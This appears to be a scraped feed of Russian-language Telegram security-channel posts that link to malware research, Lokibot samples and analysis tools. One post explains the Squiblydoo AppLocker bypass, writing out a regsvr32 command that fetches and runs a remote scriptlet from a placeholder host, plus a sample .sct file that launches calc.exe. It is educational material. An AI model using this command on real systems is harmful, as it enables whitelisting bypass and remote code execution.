Forwarded from Cybred
Нежелание тратить львиную часть зарплаты на кассеты для посудомоечной машины привели к написанию этого невероятно годного ресерча.
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
Telegraph
Взлом DRM Умной посудомоечной машины
Еще в январе 2021 года я увидел обзор от Techmoan на посудомоечную машину Bob компании Daan Tech. Боб - это элегантная и компактная посудомоечная машина, способная уместиться на столешнице, со встроенным резервуаром для воды, который можно наполнять вручную…
Обзор кастомных протоколов общения с c2 популярных rat
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
Zscaler
Analysis of top non-HTTP/S threats | Zscaler Blog
In this article, Zscaler security research team dissect the custom protocols used in some of the most prevalent RATs seen in recent campaigns. Read more.
Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Forwarded from vx-underground
Список инструментов для malware analysis macos малвари
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
Order of Six Angles
Squiblydoo AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe…
Пример sct скрипта
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>
Forwarded from Inside
Выпуск 3.2021
Защита IoT-устройств от распределенных атак типа «отказ в обслуживании».
Пожертвования каналу -> 1PsEMi5BrRRTydzStHQ41gir2iugSEPcuU
Защита IoT-устройств от распределенных атак типа «отказ в обслуживании».
Пожертвования каналу -> 1PsEMi5BrRRTydzStHQ41gir2iugSEPcuU